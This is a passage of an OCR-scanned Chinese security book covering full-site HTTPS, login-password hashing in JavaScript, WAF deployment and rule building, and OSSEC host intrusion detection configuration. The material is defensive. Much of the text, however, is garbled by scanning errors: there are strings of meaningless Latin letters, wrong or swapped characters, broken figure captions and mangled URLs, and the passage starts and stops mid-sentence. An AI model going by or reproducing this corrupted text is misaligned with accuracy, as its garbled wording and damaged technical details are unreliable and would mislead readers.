(https://datatracker.ietf.org/doc/draft-ietf-dprive-dns-over-tls/? 
include_text=1) ， 相 信 随 着 刚 需 会 很 快 变 成 现实 。 


2. 全 站 HTTPS 


全 站 HTTPS 主 要 解决 当前 越 来 越 严峻 的 网 民 隐 私 泄露 问题 ， 减 少 
被 中 间 人 监听 和 会 话 劫持 的 可 能 。 之 前 HITPS 多 用 在 登录 和 交易 环 
节 ， 现 在 国内 也 开始 紧 跟 国外 互联 网 的 趋势 逐渐 进入 全 站 HTTPS 时 
代 。 


升级 成 全 站 HTTPS 对 于 大 型 站 点 来 说 是 一 个 比较 复杂 的 工程 ， 这 
里 只 强调 一 下 与 安全 相关 的 部 分 : 


:SSL/TLS 协 议 一 一 对 于 和 常用 的 协议 TLS1.2，TLS1.1，TLS1.0 和 
SSL3.0， 目 前 只 有 TLS1.1 和 TLS1.2 和 暂时 没有 了 曝 已 知 的 安全 漏洞 ， 基 本 
上 互联 网 公司 的 在 线 业务 都 使 用 这 两 个 版 本 ， 在 TLS1.3 面 世 之 前 没有 


太 多 选择 。 


-加密 算法 一 一 密 钥 交换 算法 建议 使 用 RSA 或 ECDHE_RSA。 内 容 
传输 加 密 建 议 使 用 AES-GCM， 目 前 google 推 出 的 boring ssl 支 持 新 型 的 
流 式 加 密 算法 ChaCha20 也 可 用 于 内 容 加 密 。 


' 防 降级 攻击 一 一 降级 攻击 一 般 手法 是 伪造 客户 端 请 求 ， 试 图 改变 
加 密 算 法 为 不 安全 的 加 密 或 改变 协议 版 本 为 低 版 本 ， 针 对 这 样 的 攻 
击 ， 需 要 配置 SCSV (Signaling Cipher Suite Value) 选项 ， 另 外 需要 禁 
止 客户 端 主动 重 协商 。 


其 他 问题 一 一 如 有 果 为 提升 性 能 支持 TFO (TCP Fast Open- 
RFC7413) ，TFO 实 际 上 人 允许 TCPISYN 包 带 payload， 对 现 有 的 抗 DDoS 
策略 会 产生 比较 大 的 影响 。 


大 型 站 点 除了 Web 服 务 器 需要 支持 HTTPS 以 外 ，CDN 也 需要 支持 
HTTPS， 一 般 情 况 下 需要 把 网 站 的 私 钥 提 供给 CDN 服 务 商 ， 但 这 样 就 
引入 了 第 三 方 的 风险 ， 不 得 不 提 的 是 cloudflare， 它 提供 了 keyless 的 
HTTPS 服 务 ， 分 成 几 种 实现 ， 从 轻 度 到 重度 ， 如 图 7-19 所 示 。 


Flexible SSL 只 做 客户 端 浏览 器 到 CDN 之 间 的 HITPS 加 密 ， 回 源 使 
FAHTTP ° Full SSL 这 个 层次 不 止 实现 前 者 ， 还 包括 CDN 到 源 站 之 间 也 
是 用 HTTPS， 但 不 校 验 服务 问 证 书 ， 而 第 三 个 层次 不 仅 全 HTTPS， 且 
ARRAS HVE BAB OE o ARNT ASSAM SS, the el 
Flexible SSL 这 个 层次 ， 就 能 缓解 靠近 用 户 那 一 侧 被 劫持 的 问题 ， 后 面 
的 部 分 由 厂商 自己 来 保证 。 但 Flexible SSL 是 否 就 够 用 ， 要 看 具体 业 
务 ， 对 于 安全 性 和 隐私 保护 极 高 的 业务 ， 例 如 金融 行业 的 在 线 服 务 的 
HTTPS 和 需要 使 用 严格 版 本 的 SSL 加 密 。 


Flexible SSL 


i A — A 


Visitor CloudFlare Origin server 


Full SSL 
Requires SSL on your host 


i = 


Visitor CloudF lare Origin server 


Full SSL(strict) 
Requires a valid SSL certificate 


ñ 二 后; "E 


Visitor CloudFlare 


Origin server 


图 7-19 HTTPS 的 三 种 不 同 模式 


3. 登 录 过 程 加 密 


BIB EHTTPSHVAA PROS, BOOM ATE, Ub AK 
替换 ， 无 知 的 小 白 用 户 还 是 选择 了 不 安全 的 连接 怎么 办 ， 另 一 方面 现 
在 还 出 现 了 在 IDC 测 支持 流量 的 攻击 行为 ， 后 一 种 盗号 的 效果 直通 拖 
库 ， 于 是 有 的 厂商 想到 了 在 HITPS 的 基础 上 ， 在 应 用 层 再 实现 一 次 加 
密 ， 即 便 你 动 持 了 流量 ， 也 看 不 到 明文 。 以 某 厂 账号 的 网 页 登录 为 
例 ， 登 录 过 程 中 ， 在 客户 端 利用 JavaScript 先 将 用 户 输入 的 口令 加 密 ， 


然后 再 提交 给 服务 端 。 


function preprocess(A){ 


var B = ; 
B += A.verifycode.value; / /获取 验证 码 的 值 
B = B.toUpperCase(); // 将 验证 码 转换 成 大 写字 母 


A.p.value = md5(md5_3(A.p.value) + B); 
// 先 将 口令 进行 


md5_3( ) 加 密 ， 然 后 和 验证 码 再 做 一 次 


MD5 
return true 
} 


这 是 早期 的 一 个 版 本 ， 后 来 变 成 如 下 加 秘方 式 : 


md5(md5(hexchar2bin(md5(pwd) )+uin)+verifycode. toUpperCase() ) 


其 加 密 算法 一 直 在 更 新 ， 不 过 这 里 只 是 为 了 举例 说 明 javaScript 加 
密 在 对 抗 动 持 下 的 作用 。 当 然 JavaScript 加 密 用 于 传输 密 文 只 是 一 方 
面 ， 男 一 方面 也 是 为 了 防止 协议 人 敢 同 后 引发 的 业务 安全 问题 ， 例 如 目 
动 化 注册 机 。 


4. 跨 IDC 传 输 加 密 


对 于 真正 发 生 于 IDC 链 路 层 的 支持 ， 目 前 没有 很 好 的 解决 方案 ， 只 
能 尽 可 能 做 到 在 跨 IDC 传 输 ， 跨 安全 域 传输 的 时 候 使 用 加 密 通道 。 应 用 
层 文 持 全 流量 TLS 或 加 密 的 VPN 点 对 上 后 连 毛 。 


AWS CE SAAB) 是 业内 公认 安全 做 得 比较 好 的 平台 。 作 
为 第 三 方 平台 AWS 的 合 规 性 支持 是 目前 种 类 最 多 的 ， 包 括 : 


‘SOC 1/SSAE 16/ISAE 3402 (formerly SAS 70) 
‘SOC 2 

SOG 3 

-FISMA, DIACAP, and FedRAMP 

‘DOD CSM Levels 1-5 

"PCI DSS Level 1 

‘ISO 27001 

:TTAR 


“FIPS 140-2 


"MTCS Level 3 
-HIPAA 
-Cloud Security Alliance (CSA) 


-Motion Picture Association of America (MPAA) 


之 所 以 能 做 到 这 个 程度 是 因为 基础 安全 做 得 比较 好 ， 表 现在 一 些 
细节 上 ， 比 如 AWS 几 乎 所 有 的 上 层 产 品 都 支持 TLS 加 密 传 输 ， 例 如 : 
S3 存 储 、Glacier 备 份 、 所 有 类 型 RDS 服 务 、DynamoDB (Cache) ` 
Redshift (BI) 、EMR (大 数据 ) ` Kinesis ( 流 式 计算 ) 等 。 


DNSpod d+ 
https://www.dnspod.cn/httpdns 
cloudflare: 


https://www.cloudflare.com/ssl/ 


7.4 ”应 用 防火 墙 WAF 


应 用 防火 墙 (Web Application Firewall，WAF) 是 Web 应 用 防护 系 
统 ， 也 称 “ 网 站 应 用 级 入 侵 防御 系统 *”。 通 过 针对 基于 HTTP/HTTPS 协 议 
的 流量 建立 检测 或 拦截 规则 ， 实 现 安全 防护 的 目的 。 因 其 部 署 较为 灵 
活 ， 且 对 业务 的 侵入 性 比较 小 ， 是 近 几 年 非常 受 欢 迎 的 一 类 安全 系 
统 ， 且 商业 化 产品 层出不穷 。 


7.4.1 WAF2ZE 428 


WAF 架 构 根 据 部 署 方 式 的 不 同 ， 通 党 分 为 cnqame 部 署 、module 部 
署 、 网 络 层 部 署 。 也 有 部 分 公司 根据 自身 需要 实施 混合 部 署 与 运营 的 
架构 ， 这 通常 需要 一 定 的 架构 设计 和 开发 能 力 ， 包 括 业 务 方 的 配合 。 
国外 几 款 商业 产品 的 WAF 文 持 导 入 证 书 的 方式 来 解决 HITPS 环 境 的 安 
全 防护 ， 通 常 国内 各 甲 方 安全 团队 目 研 WAF 产 品 基 本 不 文 持 HTTPS。 


1.cname 部 署 


这 是 近 几 年 国内 非常 流行 的 WAF 部 署 ， 知 道 创 宇 推出 的 “加 速 
乐 ” 就 是 其 代表 产品 。 其 部 署 方 式 非 常 简单 方便 。 只 和 需 将 域名 Cname 方 
式 解 析 指 向 加 速 乐 分 配 的 mame 别 名 束 完 成 了 部 署 。 对 于 用 户 来 说 ， 整 
个 WAF 的 防护 和 运 膏 几乎 是 透明 的 。 


cname 方 式 最 大 的 优势 吏 生 部 署 方 便 快 速 ， 且 理论 上 还 有 加 速 网 站 
性 能 还 和 阻 断 DDoS 攻击 等 效果 ， 实 现 了 安全 防护 和 性 能 优化 双重 目 
标 。 这 也 十 音 见 的 厂商 宣 。 但 其 缺陷 也 是 非常 明显 的 ，HTTPS 流 量 是 
无 法 防护 的 ， 因 为 中 间 代理 无 法 解析 请 求 内 容 ， 进 而 无 法 对 其 攻击 负 
载 做 检测 与 防护 。 


2.module 部 署 


module 部 署 的 WAF 典 型 产品 是 开源 软件 ModSecurity (官方 网 站 : 
http://www.modse-curity.org/ ) ° 最初 ModSecurity 是 基于 Apache httpd 上 
的 module 开 发 出 来 的 ， 针 对 HTTP/HTTPS 协 议 攻击 做 检测 和 防护 的 开源 
产品 。 现 在 已 经 衍生 出 IIS 版 和 Nginx 版 。 


这 种 部 署 方式 相 比 cname 方 式 拼 烦 得 多 ， 需 在 webserver 部 署 \ 编 译 
时 支持 modules， 编 译 完 ModSecurity 模 块 之 后 ， 修 改 webserver 配 置 文 件 
生效 。 它 通常 默认 就 已 经 有 大 量 的 安全 策略 规则 ， 但 如 果 全 启用 ,一 
方面 性 能 消耗 很 大 ， 另 一 方面 也 未 必 适 用 于 目 且 环境 安全 问题 。 所 以 
后 续 还 要 对 规则 进行 优化 精简 和 按 需 增加 ， 对 运营 人 员 的 要 求 相对 较 
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基于 业务 环境 webserver 功 能 的 不 同 ， 还 出 现 了 一 些 非典 型 不 知名 


发 的 WAF。 理 论 上 成 熟 的 webserver 均 有 module 等 二 次 开发 接口 ， 均 可 
以 按 需 开发 建设 相应 WAF 类 功能 产品 。 


Module WAF 在 应 对 HTTPS 类 业务 时 非常 适用 ， 缺 点 是 产品 开发 与 
运营 成 本 非常 高 。 部 署 过 程 需要 业务 中 断 且 运营 人 员工 作 量 较 大 ， 需 
逐 台 Server 部 署 ， 对 于 规则 的 运营 也 需要 投入 大 量 人 力 。 所 以 适合 有 一 
定 开发 和 运营 能 力 ， 且 业务 规模 较 小 的 公司 。 


3. 网 络 层 部 署 


此 类 WAF 产 品 是 最 易 部 署 的 方式 ， 它 可 部 署 在 机 房 或 某 被 防护 的 
网 络 入 口 位 置 。 这 不 同 于 其 他 几 类 ， 它 的 部 署 和 运营 可 以 算是 真正 的 
透明 。 不 需要 对 业务 有 太 多 侵入 与 变更 ， 特 别 适 合 互联 网 公司 变更 
多 、 架 构 复 洒 的 环境 。 


它 的 缺 扣 明显 ， 对 于 HTTPS 协 议 无 能 为 力 。 优 势 也 明显 ， 无 侵入 
性 ， 吻 部 署 。 不 影响 业务 性 能 ， 可 旁 路 接 入 ， 通 过 RESET 包 阻 断 HTTP 


会 话 。 


为 满足 业务 的 多 样 性 架构 的 灵活 性 ， 很 多 大 型 互联 网 公司 还 建立 
了 混合 型 的 WAF 集 群 。 可 以 通过 前 述 儿 类 WAF 的 组 合 ， 实 现 相 互补 防 
敌 盖 不 到 的 地 方 ， 真 正 实现 无 死角 防守 。 如 图 7-20 所 示 。 


7.4.2 WAF 安 全 策略 建设 


通常 一 个 WAF 产 品 起 码 会 有 两 类 规则 : 1) 通用 型 主流 漏洞 检测 与 
防护 ，2) 最 近 出 现 高 危 1day\0day 漏 洞 检测 与 防护 。 有 运营 能 力 和 重要 
资产 的 公司 会 针对 业务 特点 制定 出 第 三 类 业务 风险 类 型 的 检测 与 防 
ie 


检测 分 析 
集群 | 


— > 
ó 
Module WAF&webserver 


F T 
Cname WAF webserver 
t 
è 
> 


网 络 层 WAF webserver 


图 7-20 ”混合 型 WAF 产 品 架 构 


1. 主 流 Web 漏 洞 检测 规则 


K TAERA m EN ee Webi ix Sn, RI te Bae ZS 
FR) ° HS TEE EAL BOF: 


:owasp 测 斌 指南 (http://www.owasp.org.cn/owasp-project/OTG ) 
各 主流 Web 漏 洞 扫描 器 (WVS 


https://www.acunetix.com/vulnerability-scanner\APPS-CAN http://www- 


03.ibm.com/software/products/zh/appscan ) 
漏洞 测试 演示 平台 bWAPP (http://www.itsecgames.com/ ) 


昔 用 以 上 平台 ， 在 规则 建设 中 对 于 自 研 和 部 署 的 WAF 产 品 的 实际 
能 力 做 出 客观 的 评判 。 同 时 注意 ， 此 测试 与 适 代 优化 过 程 需要 周期 性 
进行 ， 如 图 7-21 所 示 ， 安 全 工作 有 一 个 重要 的 特点 ， 需要 及 时 更 新 。 


2. 最 新 高 危 漏 洞 检测 规则 


安全 系统 运营 最 重要 的 工作 内 容 之 一 ， 除 了 部 署 履 凋 就 是 检测 能 
力 的 迭代 更 新 。 每 当 爆 出 最 新 漏洞 的 时 候 ， 运 营 人 员 必 须 第 一 时 间 跟 
进 ， 分 析 POC 和 漏洞 原理 ， 提 取 相 应 的 检测 规则 ， 及 时 部 署 新 规则 到 
WAF 系 统 。WAF 系 统 对 最 新 漏洞 攻击 的 阻 断 也 称 为 “虚拟 补丁 ， 意 为 
非 真 正 的 安全 补丁 ， 只 是 临时 封 墙 攻击 行为 ， 为 业务 方 真正 更 新 补 ] 
万 得 宝贵 的 响应 时 间 。 


在 0day\lday 爆 发 的 时 候 ， 顾 得 时 间 是 第 一 目标 ， 而 第 一 步 也 是 最 
重要 的 一 步 就 是 及 时 获取 威胁 情报 (threat information) ， 如 图 7-22 所 
示 。 在 获取 到 情报 之 后 ， 组 织 运 营 人 员 测 斌 分析， 提取 规则 上 线 ， 到 
这 里 与 之 前 的 规则 建设 流程 相同 。 


一 人 


漏洞 平台 扫描 测试 规则 提取 测试 验收 


* BWAPP -WVS + Wireshark * OWASP 
* WebGoat * APPSCAN * tcpdump 


图 7-21 WAF 规 则 建设 流程 


A 


Ba 


M 


威胁 情报 


POC 测试 规则 提取 
*WVS - Wireshark 
* APPSCAN * tcpdump 


部 署 更 新 
“Update WAF 


- Tl 
* metasploit 


图 7-22 ”WAF 新 增 规则 建设 流程 


威胁 情报 的 获取 通常 可 以 通过 情报 渠道 、 订 阅 安 全 工具 开发 社区 
RSS、 关 注 相 应 APP 官 方 安全 信息 等 方式 。 


3. 业 务 风险 监测 规则 


在 有 足够 的 运营 能 力 前 提 下 ， 业 务 方 可 提出 某 类 规则 借用 WAF 等 
安全 系统 帮助 监控 某 些 业务 异常 行为 。 这 里 的 规则 多 数 分 两 类 : 1) 已 
发 现 的 业务 漏洞 ， 需 临时 封 堵 攻 击 行为 ， 为 漏洞 修补 顾 得 时 间 ;， 2) 某 
些 高 危 或 异常 行为 的 监控 ， 主 要 目的 生产 数据 ， 为 业务 异常 行为 分 析 
提供 数据 基础 。 


7.4.3 WAF 性 能 优化 


在 中 小 型 网 络 中 购买 一 个 商业 WAE 产 品 基本 能 满足 需求 ， 且 根据 
流量 大 小 还 可 以 选择 适 配 的 型 号 。 但 在 大 型 和 超大 型 网 络 中 ， 人 性 能 的 
优 务 变 成 天 系 到 项 目 和 系统 生死 存亡 的 关键 性 问题 。 下 面 束 介绍 WAF 
的 性 能 优化 方式 。 


1. 架 构 优化 


在 WAF 项 目 评 信和 与 预 钱 初期 ， 染 构 的 选择 是 评 佑 重点， 也 同样 影 
啊 最 终 产 品 的 性 能 。 选 择 考量 的 因素 包括 团队 能 掌控 与 选择 的 唤 源 ， 
业务 方 对 性 能 的 敏感 度 ， 最 后 才 是 安全 运 莒 与 检测 能 力 效 果 的 考量 : 


资源 一 如 果 拥 有 整个 机 房 的 网 络 建设 管理 权限 ， 则 可 以 考虑 在 
机 房 核心 交换 机 处 流量 镜像 到 我 们 的 WAF 设 备 ， 此 时 无 论 WAF 的 性 能 
如 何 ， 均 不 会 影响 业务 的 正常 运营 ， 是 较为 理想 的 以 检测 为 目的 的 
WAF 架 构 。 


:业务 性 能 一 一 安全 产品 对 性 能 的 影响 通常 是 业务 方 最 为 敏感 的 问 
wl, FETE TT REBAR A ON ETT LH EBS YA 
应 ， 可 能 因 安 全 产品 的 接 入 立马 消耗 殖 尽 。 如 采 不 能 解决 业务 方 挑战 
的 问题 ， 那 么 你 的 产品 基本 没有 被 接纳 的 机 会 。 所 以 核心 业务 基本 不 


会 接受 类 似 ModSecurity 那 种 侵入 性 的 安全 产品 ， 所 以 更 应 该 优先 选择 
Cname 或 接 入 层 module WAF 方 式 。 


2. 规 则 优化 


在 实际 检测 能 力 中 ， 规 则 计算 应 该 是 WAF 性 能 最 大 的 开销 ， 既 可 
能 影响 业务 性 能 指标 QPS， 在 大 型 网 络 中 对 计算 集群 的 资源 耗 用 也 较 
大 。 比 如 ModSecurity 历 史上 就 出 现 过 多 次 DOS 攻 击 漏洞 ， 并 且 示 经 优 
化 的 规则 也 会 导致 WAF 因 资源 消耗 的 问题 主动 痢 制 掉 部 分 检测 能 


算法 优化 一 一 WAF 的 流量 匹配 不 能 粗暴 地 直接 丢 给 正则 引擎 ， 那 
会 带 来 大 量 的 不 必要 的 开销 。 首 先 对 流量 进入 WAF 到 最 终 人 遍历 各 种 规 
则 的 整个 流程 要 考虑 清楚 ， 层 层 沪 选 直至 剩 下 真正 需要 进入 正则 匹配 
的 流量 ， 如 图 7-23 所 示 。 


优先 匹配 关键 字符 串 ， Da 
放弃 无 风险 的 不 匹配 不 进入 Serene hie ET ee 


后 续 计算 


纯 静 态 资源 请 求 


图 7-23 ”算法 优化 原则 


:正则 优化 一 一 Google 出 品 的 正则 引擎 RE2 是 目前 公认 的 较 好 引 
擎 ， 相 比 传 统 古 老 的 PCRE 引 擎 更 快速 高 效 ， 可 以 作为 引擎 的 首选 。 但 
在 实际 使 用 过 程 中 RE2 存 在 一 个 明显 的 问题 (至 少 笔者 写 书 的 时 候 还 存 
在 ) ， 那 就 是 对 二 进 制 数 据 流 匹 配 存在 问题 ， 例 如 “ 隐 含 恶意 代码 的 图 


FFER XR PCIE BA o ABZ RE WAF 5c FF UBC SA el 
的 正则 引擎， 当 评 佑 某 类 规则 可 能 页 到 二 进 制 数据 流 时 ， 可 配置 为 
PCRE 引 警 ， 默 认 则 用 RE2。 


RoE ”入 侵 感知 体系 


入 侵 感 知 钙 目前 安全 防御 体系 建设 中 最 重要 的 一 环 ， 是 大 型 互联 
网 生产 网 络 的 核心 需求 。 本 章 从 系统 、 应 用 、 后 端 架 构 等 维度 讲述 入 
侵 感 知 体系 的 实现 方法 。 


8.1 主机 入 侵 检 测 


主机 入 侵 检测 系统 (Host-based Intrusion Detection System, 

HIDS) 顾名思义 是 基于 主机 的 入 侵 检 测 系统 ， 是 部 署 在 需要 防护 的 主 
机 服务 器 上 的 一 种 软件 。 由 于 其 开发 部 署 需要 考虑 业务 环境 ， 其 架构 
对 业务 系统 侵入 性 的 部 署 也 带 来 了 版 本 适 配 等 开发 难题 ， 同 时 部 始 过 
程 也 需要 耗费 大 量 运 维 成 本 。 商 用 产品 较 少 ， 以 至 于 现在 市 面 上 知名 
的 商用 HIDS 几 乎 没有 。 在 开源 产品 方面 有 著名 的 OSSEC， 被 各 中 小 型 
互联 网 公司 选用 。 各 大 互联 网 公司 则 因为 生产 网 络 的 海量 IDC 环 境 不 得 
不 自 研 HIDS 产 品 ， 这 些 自 研 的 HDS 在 入 侵 对 抗 的 一 线 不 断 的 迭代 更 
新 ， 其 能 力 和 效果 甚至 会 比 商业 产品 更 好 ， 至 少 非常 适合 自身 的 生产 
网 环境 ， 同 时 根据 目 身 安全 需求 它们 往往 已 经 不 再 是 传统 的 标准 HIDS 
架构 。 下 面 分 别 介绍 这 两 类 产品 。 


8.1.1 开源 产品 OSSEC 


OSSEC 是 著名 的 开源 HIDS 产 品 (http://www.ossec.net/ ) ， 且 长 期 
维护 更 新 。 它 的 版 本 徐 盖 了 主流 操作 系统 ， 文 持 Linux\BSD\Windows， 
以 及 Linux 的 多 个 发 行 版 的 不 同 版 本 ， 并 提供 源码 安装 ，RPM 和 DEB 安 
装 方式 。 非 常 适合 中 小 型 网 络 ， 服 务 器 规模 小 于 10000 台 的 生产 网 环 


。 同 时 在 最 近 还 出 现 了 Virtual Appliance 版 ， 那 些 使 用 云 服务 的 小 企 


业 也 可 以 选择 此 类 部 署 方式 。 


Server/Agent 

Web UI 

Documentation 

Latest Stable Release (2.8.2) 
Server/Agent 2.8.2 — Linux/BSD 
Agent 2.8 — Windows 

Web UI 0.8 

Server Virtual Appliance 2.8.2 


2.8.1 Release 
Server/Agent 2.8.1 — Linux/BSD 
Server Virtual Appliance 2.8.1 


OSSEC 开 源 发 行 版 本 如 图 8-1 所 示 。 


https://github.com/ossec/ossec-hids 


https://github.com/ossec/ossec-wui 
https://github.com/ossec/ossec-docs 


ossec-hids-2.8.2.tar.gz — Release Notes 
ossec-agent-win32-2.8.exe 
ossec-wui-0.8.tar.gz 
ossec-vm-2.8.2.0va — README 
ossec-vm-2.8.2.0va — README (mirror) 


ossec-hids-2.8.1.tar.gz — Release Notes 
ossec-vm-2.8.1.0va — README 


过 各 种 模块 ， 


图 8-1 OSSEC 开 源 发 行 版 本 
OSSEC 是 典型 的 BS 染 构 ，Agent 闹 会 通 
据 上 报到 Server， 


到 DB 或 通过 WUI 展 现 。 
变更 等 方式 ， 增 强 其 检测 能 
采集 处 理 框架 。 


其 Agent 和 Server 闪 都 可 以 通过 二 
力 ， 所 以 你 也 可 以 把 OSSEC 当 成 一 个 数据 


分 析 并 采集 数 


如 图 8-2 所 示 。 在 Server 端 接受 数据 ， 并 分 析 数 据 存储 


次 开发 ， 规 则 


根据 处 理 数据 量 和 机 房 布 置 的 需求 ， 整 个 大 的 公司 生产 网 可 以 划 
分 成 多 个 处 理 集 群 。Server 端 可 以 有 不 同 的 配置 方式 。 通 党 一 个 Server 
集群 (数据 收集 & 分 析 & 存储) 最 多 配置 2000 台 agent 接 入 。 


I ossec AGENTS | 


数据 接收 数据 分 析 存储 \ 展现 


BSD agent 


L. ail 


图 8-2”OSSEC 典 型 架构 
OSSEC 的 管理 运 理 如 下 : 


Agent 部 署 一 一 OSSEC 的 入 侵 检 测 能 力 基于 各 Agent 从 主机 上 采集 
到 的 数据 的 分 析 ， 在 整套 入 侵 检测 系统 建设 第 一 步 束 是 部 署 Agent， 同 


一 套 入 侵 检测 系统 中 可 以 有 众多 不 同 版 本 的 Agent 存 在 ， 包 括 
Windows、Linux。OSSEC Agent 在 部 署 的 时 候 会 生成 一 个 keys， 用 于 与 
服务 器 的 通信 协议 认证 。 所 有 操作 系统 的 OSSEC Agent 均 以 后 台 服 务 模 
式 被 安装 。Agent 端 默认 会 采集 某 些 系统 数据 ， 比 如 Linux 系 统 
H‘J/var/log/message ` /var/log/authlog ` /var/www/logs/access_log<# fi ILAS 
入 侵 过 程 可 能 遗留 下 痕迹 的 地 方 。 在 Windows 上 则 会 采集 系统 上 默认 会 
存在 的 application 、security、system 三 类 日 志 。 在 木马 检测 方面 ， 
OSSEC AGENTS 会 根据 配置 项 检测 一 些 常见 木马 和 文件 异常 行为 。 


:配置 管理 一 一 OSSEC 的 检测 能 力 均 来 目 数据 采集 与 分 析 ， 而 具体 
有 什么 能 力 则 是 通过 配置 来 实现 。 分 为 : 前 端 数据 采集 配置 ossec- 
agent.conf; 后 端 数据 解析 配置 decoderxml; 数据 分 析 规 则 配置 
rule/apache_rules.xml、rule/syslog_rules.xml 等 。 目 身 系统 的 管理 也 是 可 
配置 的 ossec.conf、ossec-serverconf， 规 则 集 管理 和 告警 邮箱 、 扫 描 频 


率 、 木 马 特 征 库 配置 等 。OSSEC 配 置 管理 如 图 8-3 所 示 。 


「 QssECAGENTS | 


ossec-agent.conf 
ossec-local.conf 
internal_options.conf 


= 
A d 
ossec.conf ossec.conf 
ossec-server.conf ossec-server.conf 
decoder.xml decoder.xml 
S Rule/apache_rules.xml 
ossec-agent.conf Rule/ids_rules.xml 


ossec-local.conf 
internal_options-win.conf 


b - 


图 8-3 ”OSSEC 配 置 管 理 


前 面 介 绍 了 OSSEC 主 要 是 通过 配置 文件 来 决定 收集 哪些 信息 ， 主 
要 分 为 三 类 : 系统 目 身 产生 的 日 志 、 任 何 用 户 配置 的 文本 日 志 、 通 过 
OSSEC 目 市 功能 生成 的 数据 日 志 。 其 检测 能 力 如 下 : 


1) 规则 配置 一 一 配置 文件 以 XML 格 式 书写 ， 一 个 典型 的 配置 如 下 
所 示 ， 这 表示 可 采集 本 地 的 message 和 secure 日 志文 件 内 容 : 


<localfile> 
<log_format>syslog</log_format> 
<location>/var/log/messages</location> 
</localfile> 
<localfile> 
<log_format>syslog</log_format> 


<location>/var/log/secure</location> 
</localfile> 


任何 数据 被 收集 到 服务 端 之 后 ， 还 需要 通过 decoder 解 码 格式 化 为 
服务 端 分 析 所 需 格式 ， 由 配置 文件 decoderxml 定 义 解码 规则 。 一 个 典 
型 的 解码 规则 如 下 所 示 : 


<decoder name="sshd-success"> 
<parent>sshd</parent> 
<prematch>^Accepted</prematch> 
<regex offset="after_prematch">^ \S+ for (\S+) from (\S+) port </regex> 
<order>user, srcip</order> 
<fts>name, user, location</fts> 
</decoder> 


以 上 规则 可 以 理解 为 “一 个 SSH 登 录 成 功 记录 ”， 并 且 会 输出 几 个 关 
键 字段 : 用 户 、 来 源 IP。 


为 了 其 数据 分 析 的 效率 考虑 ， 它 做 了 很 多 优化 的 细 市 : 


事件 集 归 类 ， 如 上 述 示例 会 将 匹配 到 的 事件 归 类 到 SSHD 事 件 集 ， 
方便 后 端的 事件 分 析 。 


分 级 匹配 ，prematch 预 匹配 一 个 粗 粒 度 的 正则 表达 式 ， 避 免 不 必 
要 的 全 量 原 始 数据 直接 进入 复杂 正则 表达 式 ， 减 轻 数 据 格式 化 引擎 
担 。 


-从 所 周知 ，PCRE 儿 乎 是 最 强大 的 正则 引擎 ， 但 因为 它 的 强大 也 拖 
索 了 使 用 效率 。OSSEC 的 正则 表达 式 解 析 不 使 用 PCRE 正 则 引 敬 ， 而 是 


自己 实现 了 一 个 简化 版 的 正则 引擎 称 之 为 <0s_regex Library” « 


2) 默认 能 力 \ 规 则 一 一 当 部 署 完毕 OSSEC 启 动 之 后 ， 安 装 包 中 目 
带 的 规则 集束 让 你 具备 了 初步 的 安全 事件 检测 能 力 ， 包 括 但 不 限于 以 
下 内 容 : 


SSH 破解 相关 规则 。 

-webserver (Apache\Nginx) 日 志 检 测 规 则 。 

杀毒 软件 (Symantec\calm) 事件 告警 规则 。 

安全 设备 (IDS\FIREWALL\SonicWall) 事件 告警 规则 。 
.DB (MySQL\postgresql) 事件 告警 规则 。 

:Ftpserver (proftpd\pure-ftpd\ms-ftpd) 事件 告警 规则 。 
其 他 常见 应 用 服务 事件 告警 规则 。 


3) 误 报 一 一 作为 一 个 开源 软件 ， 能 够 做 到 对 一 个 中 型 生产 网 络 的 
种 见 入 侵 事 件 的 检测 能 力 ， 确 实 难 能 可 贯 。 但 因 其 开源 软件 的 属性 ， 
其 功能 基本 上 有 是 满足 基准 需求 ， 可 用 人 够 用 就 好 ， 在 实际 运营 中 会 有 很 
多 的 误 报 出 现 。 为 了 对 其 误 报 场景 有 足够 的 理解 ， 不 会 被 其 干扰 ， 基 
至 可 以 按 需 调 优 。 以 下 举例 说 明 一 些 误 报 场 景 。 


Rootkit 检测 误 报 一 -0OSSEC 的 rootkit 检 测 方式 非常 ' 士 :， 但 有 效 。 
其 中 “隐藏 端口 "检测 逻辑 是 主动 笑 试 去 连接 本 地 的 1-65535 端 口 ， 然 后 
与 netstat 命 令 结 采 对 比 。 整 个 逻辑 清晰 ， 代 码 也 简洁， 作为 一 个 普通 主 
机 的 安全 检测 是 完全 有 效 的 。 可 是 在 一 个 负载 很 高 业务 进程 繁忙 的 
Server 上 很 可 能 产生 误 报 ， 因 为 每 次 的 1-65535 循 环 过 程 中 ， 每 个 端 
的 检测 逻辑 按 OSSEC 代 码 来 看 就 需要 花 4 秒 ， 加 之 netstat 命 令 在 高 负载 
机 器 上 也 执行 非常 慢 ， 在 netstat 还 未 执行 完毕 的 时 候 ， 原 先 能 connect 的 
端口 早已 关闭 ， 会 导致 误 报 “Kernel-level rootkit or trojaned” rootkits yx 


端口 。 


文件 修改 检测 误 报 一 一 安全 系统 对 于 系统 关键 文件 必须 是 要 有 监 
控 的 ， 常 见 的 做 法 就 是 做 MD5 对 比 ，OSSEC 也 有 相应 功能 。 有 一 种 场 
景 可 能 导致 误 报 ， 当 磁盘 故障 时 ， 每 次 对 同一 个 文件 的 MD5 计 算 都 不 
一 样 ，OSSEC 检 测 到 这 类 事件 会 告警 。 所 以 磁 到 此 类 告警 可 能 移 要 排 
除 是 系统 故障 的 可 能 。 


历史 上 各 时 期 总 会 有 不 同 的 安全 事件 热点 ， 远 程 缓 冲 层 洪 出 攻 
击 、 弱 口令 破解 、Web 漏 洞 攻 击 等 等 ， 所 以 你 会 发 现 一 成 不 变 的 规则 是 
不 能 满足 所 有 阶段 以 及 所 有 企业 的 生产 网 风险 场景 的 。 那 么 你 需要 不 
TIS 5c Se BE 


OSSEC 拥 有 基础 的 入 侵 检测 能 力 ， 同 时 也 可 以 看 做 是 一 个 基础 数 
据 采 集 和 分 析 框架 引擎 ， 如 果 需 要 新 增 检测 能 力 ， 通 过 增加 数据 和 分 


析 规 则 是 可 以 实现 的 。OSSEC 的 功能 扩展 如 图 8-4 所 示 。 


开发 插件 采集 数据 解析 \ 检测 规则 
修改 本 地 配置 文件 


ossec-agent.conf, 


修改 decoder xml 


开发 本 地 扫描 检测 格式 化 采集 的 日 志 


工具 并 写 入 指定 日 
志文 件 


添加 配置 项 采集 生 


成 的 站 吉文 人 根据 检测 规则 ， 配 


置 rule/your log.xml 


图 8-4 OSSEC 功 能 扩展 


扩展 功能 介绍 如 下 : 


1) 开发 插件 ， 生 产 数 据 一 一 为 了 对 某 类 事件 有 感知 能 力 ， 首 先 开 
